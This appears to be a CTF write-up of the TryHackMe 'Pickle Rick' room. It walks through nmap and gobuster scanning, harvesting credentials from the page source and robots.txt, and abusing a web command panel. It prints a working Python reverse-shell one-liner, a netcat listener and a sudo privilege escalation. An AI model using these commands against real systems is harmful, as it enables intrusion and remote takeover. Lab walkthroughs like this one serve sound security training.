Pickle Rick(Tryhackme) Room Writeup By Jonty Bhardwaj
Hello Reader, I am Jonty Bhardwaj currently enrolled in Master Certificate in Cyber Security HackerU program. Today I am here to share a writeup on a Tryhackme machine called Pickle Rick.
Now first of all we will navigate to the Room URL and join it.
After starting the machine we connect through OpenVPN and ping the IP we are given to confirm that the connection is established. Once the ping succeeds, we start the fun part: pentesting the box and getting root privileges.
Now first we will start a Nmap scan to see what are the ports and services open on the machine.
nmap -sV -sT -T4 10.10.32.250
Now we can see that 2 ports are open, and the most promising one for gathering information is port 80. Let's see what's on the website.
Viewing the source code of the main web page, we found a useful piece of information: a username.
Next we see that there is a robots.txt file on the server. Opening it, we found a string written in it that looks like a password.
So far we have a username and a string resembling a password.
Username : R1ckRul3s
Password : Wubbalubbadubdub
Now let's find more on the website by running a Gobuster scan to discover any hidden pages or directories (Gobuster's directory mode is `dir`; the `-x php` flag also tries each wordlist entry with a .php extension).
gobuster dir -u http://10.10.32.250/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100 -x php
The gobuster scan shows that there is a login page on the server at /logon.php.
Let's open this page and see what's there.
With the credentials we gathered we log in successfully and find a command panel.
This command panel runs whatever we type on the server, so we can use it to read sensitive files or even launch a reverse shell and get a shell back on our own machine.
Running the ls command in the command panel shows that there are many files on the server.
Among them is the first ingredient file, named Sup3rS3cretPickl3Ingred.txt.
Let's open this file in the browser and see what the ingredient is.
We have found our first ingredient.
Now let's run a one-liner reverse shell command through the command panel and get a shell back on our listener.
First we start the listener.
nc -lnvp 4444
The listener is open and ready; now we have to run a reverse shell command in the command panel to get a shell back.
We checked whether the machine has Python installed.
Python 3 is installed on the system, which means we can use a Python 3 reverse shell (the IP below is our own VPN address, the one the listener is bound on).
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.107.42",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
As soon as we executed the reverse shell in the command panel we got a shell back on our listener.
After some searching we found the second ingredient in the home directory of the user rick.
cat /home/rick/"second ingredients"
Now let's check what this user is allowed to run with sudo, to see whether we can reach the root directory.
As we can see, the user can run any command through sudo, so it is effectively a sudo user.
That makes our job extremely easy, as we don't have to exploit any program to get root privileges.
Here we have successfully escalated to a root shell through sudo and found the third ingredient in the root folder.
Proof of Completion
Congratulations on completing the room, and thank you for reading. I hope this writeup helped you on your journey and taught you something new.
Happy Hacking !!